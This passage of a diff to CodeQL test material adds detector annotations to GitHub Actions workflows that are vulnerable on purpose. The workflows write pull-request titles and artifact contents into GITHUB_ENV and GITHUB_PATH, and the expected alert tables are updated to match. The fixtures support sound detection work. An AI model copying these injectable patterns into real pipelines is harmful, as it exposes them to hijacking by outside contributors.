diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml index 36340258515..076941d4aec 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -8,20 +8,20 @@ jobs: runs-on: ubuntu-latest steps: - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=${TITLE##*/} - echo PR_TITLE=${FOO} >> $GITHUB_ENV + echo PR_TITLE=${FOO} >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | FOO=$TITLE+ - echo PR_TITLE=$FOO >> $GITHUB_ENV + echo PR_TITLE=$FOO >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - env: - TITLE: ${{ github.event.pull_request.title }} + TITLE: ${{ github.event.pull_request.title }} # $ Source[actions/envvar-injection/critical] run: | venv="$(echo $TITLE)')" - echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml index c33c90dbb9c..f9e0ea8a324 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -13,7 +13,7 @@ jobs: run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Load .env file + - name: Load .env file # $ Source[actions/envvar-injection/critical] uses: aarcangeli/load-dotenv@v1.0.0 with: path: 'backend/new' 
@@ -21,5 +21,5 @@ jobs: .env .env.test quiet: false - if-file-not-found: error + if-file-not-found: error # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml index 806f8dc8e45..c84dcae914c 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -27,13 +27,13 @@ jobs: run_id: ${{ github.event.workflow_run.id }} path: ./artifacts - - name: assignment + - name: assignment # $ Source[actions/envvar-injection/critical] run: | foo=$(cat ./artifacts/parent-artifacts/event.txt) - echo "foo=$foo" >> $GITHUB_ENV + echo "foo=$foo" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 1 run: | - echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] - name: direct 2 run: | - echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml index 3ed80374ef6..6f7d3b9cffc 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -24,7 +24,7 @@ jobs: name: event_file path: artifacts/event_file - - name: Try to read PR number + - name: Try to read PR number # $ Source[actions/envvar-injection/critical] id: set-ref run: | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) 
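Review bot: The tag on `if-file-not-found: error # $ Alert[actions/envvar-injection/critical]` sits on an unrelated option of the `with:` map, presumably because the `uses:` step's location ends on its last key; a reader is likely to take it as flagging that option. A one-line YAML comment above it, `# the alert is reported on the last line of the load-dotenv step, hence the tag here`, would make the placement self-explanatory. The step itself (`- name: Load .env file`, tagged `# $ Source`) starts in the previous hunk.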
@@ -38,4 +38,4 @@ jobs: fi echo "pr_num=$pr_num" >> $GITHUB_ENV - echo "ref=$ref" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV # $ Alert[actions/envvar-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index f544994fc5c..398a8013173 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -1,3 +1,9 @@ +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | 
@@ -16,9 +22,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 80f72124fe4..01345ebb915 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionCritical.ql +query: Security/CWE-077/EnvPathInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index 5be9f729ad6..d18365265b8 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -16,4 +17,3 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index 165a3d20896..e61216acaa4 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-077/EnvPathInjectionMedium.ql +query: Security/CWE-077/EnvPathInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 9914ae91df1..85035023f66 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,3 +1,40 @@ +#select +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
